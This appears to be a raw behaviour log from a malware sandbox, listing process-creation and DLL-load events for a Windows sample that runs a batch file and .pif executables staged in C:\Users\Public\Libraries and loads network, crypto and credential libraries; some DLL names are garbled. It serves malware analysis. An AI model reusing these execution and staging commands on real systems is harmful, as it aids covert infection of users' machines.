Source: unknown	Process created: C:\Users\user\Desktop\yxU3AgeVTi.exe "C:\Users\user\Desktop\yxU3AgeVTi.exe"
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Process created: C:\Users\Public\Libraries\jphwmyiA.pif C:\Users\Public\Libraries\jphwmyiA.pif
Source: unknown	Process created: C:\Users\Public\Libraries\Aiymwhpj.PIF "C:\Users\Public\Libraries\Aiymwhpj.PIF"
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Process created: C:\Users\Public\Libraries\jphwmyiA.pif C:\Users\Public\Libraries\jphwmyiA.pif
Source: unknown	Process created: C:\Users\Public\Libraries\Aiymwhpj.PIF "C:\Users\Public\Libraries\Aiymwhpj.PIF"
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Process created: C:\Users\Public\Libraries\jphwmyiA.pif C:\Users\Public\Libraries\jphwmyiA.pif
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Process created: C:\Users\Public\Libraries\jphwmyiA.pif C:\Users\Public\Libraries\jphwmyiA.pif	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Process created: C:\Users\Public\Libraries\jphwmyiA.pif C:\Users\Public\Libraries\jphwmyiA.pif	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Process created: C:\Users\Public\Libraries\jphwmyiA.pif C:\Users\Public\Libraries\jphwmyiA.pif

Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: url.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: winhttpcom.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: ??????????.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: tquery.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: sppwmi.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: sppcext.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: winscard.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\yxU3AgeVTi.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: url.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ??????????.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: am.dll	Jump to behavior
